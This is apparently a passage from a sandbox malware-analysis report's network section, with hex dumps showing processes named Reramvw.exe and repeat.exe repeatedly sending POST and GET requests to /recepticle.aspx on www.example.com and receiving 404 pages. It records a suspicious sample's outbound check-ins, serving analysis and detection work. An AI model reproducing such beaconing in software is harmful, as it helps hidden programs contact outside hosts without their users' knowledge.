2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62
                                                                              Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
                                                                              Feb 21, 2024 21:08:50.230674982 CET312INData Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69
                                                                              Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.54971093.184.216.34807128C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2024 21:09:04.194528103 CET172OUTPOST /recepticle.aspx HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: www.example.com
                                                                              Content-Length: 25
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2024 21:09:04.282198906 CET25INHTTP/1.1 100 Continue
                                                                              Feb 21, 2024 21:09:04.308711052 CET25OUTData Raw: 74 68 69 6e 67 31 3d 68 65 6c 6c 6f 26 74 68 69 6e 67 32 3d 77 6f 72 6c 64
                                                                              Data Ascii: thing1=hello&thing2=world
                                                                              Feb 21, 2024 21:09:04.462300062 CET652INHTTP/1.1 404 Not Found
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:04 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:04 GMT
                                                                              Server: EOS (vny/0451)
                                                                              Content-Length: 433
                                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.54971293.184.216.34807128C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2024 21:09:06.067775011 CET56OUTGET /recepticle.aspx HTTP/1.1
                                                                              Host: www.example.com
                                                                              Feb 21, 2024 21:09:06.155781984 CET1286INHTTP/1.1 404 Not Found
                                                                              Accept-Ranges: bytes
                                                                              Age: 366089
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:06 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:06 GMT
                                                                              Last-Modified: Sat, 17 Feb 2024 14:27:37 GMT
                                                                              Server: ECS (nyb/1D29)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: 404-HIT
                                                                              Content-Length: 1256
                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62
                                                                              Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
                                                                              Feb 21, 2024 21:09:06.155807972 CET312INData Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69
                                                                              Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.54972293.184.216.34807056C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2024 21:09:12.584539890 CET172OUTPOST /recepticle.aspx HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: www.example.com
                                                                              Content-Length: 25
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2024 21:09:12.672023058 CET25INHTTP/1.1 100 Continue
                                                                              Feb 21, 2024 21:09:12.672467947 CET25OUTData Raw: 74 68 69 6e 67 31 3d 68 65 6c 6c 6f 26 74 68 69 6e 67 32 3d 77 6f 72 6c 64
                                                                              Data Ascii: thing1=hello&thing2=world
                                                                              Feb 21, 2024 21:09:12.825601101 CET652INHTTP/1.1 404 Not Found
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:12 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:12 GMT
                                                                              Server: EOS (vny/0451)
                                                                              Content-Length: 433
                                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.54972493.184.216.34807056C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2024 21:09:14.209173918 CET56OUTGET /recepticle.aspx HTTP/1.1
                                                                              Host: www.example.com
                                                                              Feb 21, 2024 21:09:14.297058105 CET1286INHTTP/1.1 404 Not Found
                                                                              Accept-Ranges: bytes
                                                                              Age: 366097
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:14 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:14 GMT
                                                                              Last-Modified: Sat, 17 Feb 2024 14:27:37 GMT
                                                                              Server: ECS (nyb/1D29)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: 404-HIT
                                                                              Content-Length: 1256
                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62
                                                                              Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
                                                                              Feb 21, 2024 21:09:14.297072887 CET312INData Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69
                                                                              Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.54972793.184.216.34806472C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2024 21:09:21.959144115 CET172OUTPOST /recepticle.aspx HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: www.example.com
                                                                              Content-Length: 25
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2024 21:09:22.046473980 CET25INHTTP/1.1 100 Continue
                                                                              Feb 21, 2024 21:09:22.046825886 CET25OUTData Raw: 74 68 69 6e 67 31 3d 68 65 6c 6c 6f 26 74 68 69 6e 67 32 3d 77 6f 72 6c 64
                                                                              Data Ascii: thing1=hello&thing2=world
                                                                              Feb 21, 2024 21:09:22.198987961 CET652INHTTP/1.1 404 Not Found
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:22 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:22 GMT
                                                                              Server: EOS (vny/0451)
                                                                              Content-Length: 433
                                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.54972993.184.216.34806472C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2024 21:09:23.649080038 CET56OUTGET /recepticle.aspx HTTP/1.1
                                                                              Host: www.example.com
                                                                              Feb 21, 2024 21:09:23.736970901 CET1286INHTTP/1.1 404 Not Found
                                                                              Accept-Ranges: bytes
                                                                              Age: 366106
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:23 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:23 GMT
                                                                              Last-Modified: Sat, 17 Feb 2024 14:27:37 GMT
                                                                              Server: ECS (nyb/1D29)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: 404-HIT
                                                                              Content-Length: 1256
